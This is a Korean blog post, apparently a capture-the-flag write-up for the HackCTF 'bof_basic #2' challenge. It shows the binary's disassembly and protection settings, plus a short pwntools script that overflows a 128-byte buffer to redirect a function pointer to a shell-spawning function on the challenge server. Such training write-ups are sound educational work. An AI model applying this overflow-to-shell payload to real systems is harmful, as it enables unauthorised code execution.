[hackctf] bof_basic #2

sangjun

·

2021. 4. 18. 00:51

반응형

 

문제 소스

메인함수

Dump of assembler code for function main:
   0x080484cd <+0>:	lea    ecx,[esp+0x4]
   0x080484d1 <+4>:	and    esp,0xfffffff0
   0x080484d4 <+7>:	push   DWORD PTR [ecx-0x4]
   0x080484d7 <+10>:	push   ebp
   0x080484d8 <+11>:	mov    ebp,esp
   0x080484da <+13>:	push   ecx
   0x080484db <+14>:	sub    esp,0x94
   0x080484e1 <+20>:	mov    DWORD PTR [ebp-0xc],0x80484b4
   0x080484e8 <+27>:	mov    eax,ds:0x804a040
   0x080484ed <+32>:	sub    esp,0x4
   0x080484f0 <+35>:	push   eax
   0x080484f1 <+36>:	push   0x85
   0x080484f6 <+41>:	lea    eax,[ebp-0x8c]
   0x080484fc <+47>:	push   eax
   0x080484fd <+48>:	call   0x8048350 <fgets@plt>
   0x08048502 <+53>:	add    esp,0x10
   0x08048505 <+56>:	mov    eax,DWORD PTR [ebp-0xc]
   0x08048508 <+59>:	call   eax
   0x0804850a <+61>:	mov    eax,0x0
   0x0804850f <+66>:	mov    ecx,DWORD PTR [ebp-0x4]
   0x08048512 <+69>:	leave  
   0x08048513 <+70>:	lea    esp,[ecx-0x4]
   0x08048516 <+73>:	ret    
End of assembler dump.

shell

Dump of assembler code for function shell:
   0x0804849b <+0>:	push   ebp
   0x0804849c <+1>:	mov    ebp,esp
   0x0804849e <+3>:	sub    esp,0x8
   0x080484a1 <+6>:	sub    esp,0xc
   0x080484a4 <+9>:	push   0x80485a0
   0x080484a9 <+14>:	call   0x8048370 <system@plt>
   0x080484ae <+19>:	add    esp,0x10
   0x080484b1 <+22>:	nop
   0x080484b2 <+23>:	leave  
   0x080484b3 <+24>:	ret    
End of assembler dump.

 

보호기법

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

 

문제 분석 및 페이로드

gdb peda로 ret까지 거리 알아냈다.

peda pattern create사용법은 아래 영상 참고

 

from pwn import *
context.log_level='debug'
dns,port="ctf.j0n9hyun.xyz" ,3001
p=remote(dns,port)
#p=process("./bof_basic2")
e=ELF("./bof_basic2")
shell=e.symbols['shell']

p.send("A"*128+p32(shell))

참고문헌 및 힘들었던 부분

 

반응형

'War Games > hack-ctf' 카테고리의 다른 글

[hackctf] x64 Buffer Overflow  (0) 2021.04.18
[hackctf] 내 버퍼가 흘러넘친다  (0) 2021.04.18
[hackctf] basic_fsb  (0) 2021.04.18
[hackctf] bof_basic #2  (0) 2021.04.18
[hackctf] bof_basic #1  (0) 2021.04.18
[hact ctf] 풍수지리설 분석 자료  (0) 2021.04.16

0개의 댓글